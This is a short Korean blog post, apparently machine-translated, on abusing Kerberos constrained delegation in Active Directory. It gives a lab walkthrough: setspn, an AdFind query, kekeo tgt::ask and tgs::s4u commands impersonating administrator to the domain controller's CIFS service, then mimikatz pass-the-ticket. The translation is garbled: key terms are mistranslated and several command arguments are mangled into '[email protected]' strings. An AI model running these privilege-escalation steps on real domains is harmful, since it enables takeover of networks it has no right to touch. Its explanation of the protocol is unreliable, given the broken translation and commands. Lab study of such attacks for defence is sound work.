Kerberos 협의의 약정 위원회 파견

3497 단어 Kerberos
위에서 말한 비약정 위임은 본고에서 약정 위임이라고 한다.
개술
비약정위원회의 불안정성 때문에 약정위원회파가 생겨났다.2003년 이후 마이크로밴드는 비약정위원회파에 들어가 케베로스에 S4U를 도입했고 두 개의 협의인 S4U2 self, S4U2 proxy를 포함했다.S4U2self는 자신을 대표하여 자신에 대한 Keerberos 서비스 어음(ST)을 청구할 수 있고, S4U2proxy는 사용자의 이름으로 서비스를 청구할 수 있는 ST를 대표할 수 있으며, 약정위원회파는 S4U2proxy의 확장 범위를 제한한다.

구체적인 과정은 사용자의 요청에 도착한 후 먼저 사용자를 대표하여 자신의 전송 가능한kerberos 서비스 어음(S4U2SELF)을 대상으로 이 표를 가지고 KDC에 특정 서비스에 접근할 수 있는 전송 가능한TGS(S4U2PROXY)를 요청하고 사용자를 대표하여 특정 서비스에 접근할 수 있으며 해당 서비스만 방문할 수 있다.
실제 활용
활용단어참조
계약 위임 환경을 먼저 구성합니다.새 ql 사용자를 만들고 spn을 추가하여 서비스 사용자로 표시합니다.
setspn -A MSSQLSvc/DM.test.local:1433 sql

spn까지 합치면 위원회파 선택카드가 나오기 때문에 서비스 계정과 컴퓨터 계정만 위탁 파견될 수 있다.
여기에서 dc의cifs를 설정하면 sql 사용자가 위임할 수 있습니다.주의해야 할 것은 모든 신분 검증 프로토콜을 사용하는 것이다.

약정된 위임 계좌를 찾다
AdFind.exe -b dc=test,dc=local -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" -dn

데이트 위임 호스트 찾기
(&(samAccountType=805306368)(msds-allowedtodelegateto=*))
약정 위임은 sql 서비스 계정의 비밀번호나hash를 알아야 합니다. 이때 DM기계에서kekeo를 사용하여 tgt를 신청합니다.
tgt::ask /user:sql /domain:test.local /password:test123!@#

이 tgt를 사용하여 s4u 위조[email protected]를 통해 dc의cifs 서비스에 접근합니다.
tgs::s4u /tgt:[email protected][email protected] /user:administrator /service:cifs/dc.test.local

두 개의 tgs 생성

mimikatz를 통해cifs의 tgs표를 사용하여 진전ptt

실전에서의 이용은 위원회 사용자의 비밀번호나hash를 설정한 것을 알아야 한다.
참고 자료
  • https://xz.aliyun.com/t/7217
  • https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/1fb9caca-449f-4183-8f7a-1a5fc7e7290a
  • https://daiker.gitbook.io/windows-protocol/kerberos/2
  • 좋은 웹페이지 즐겨찾기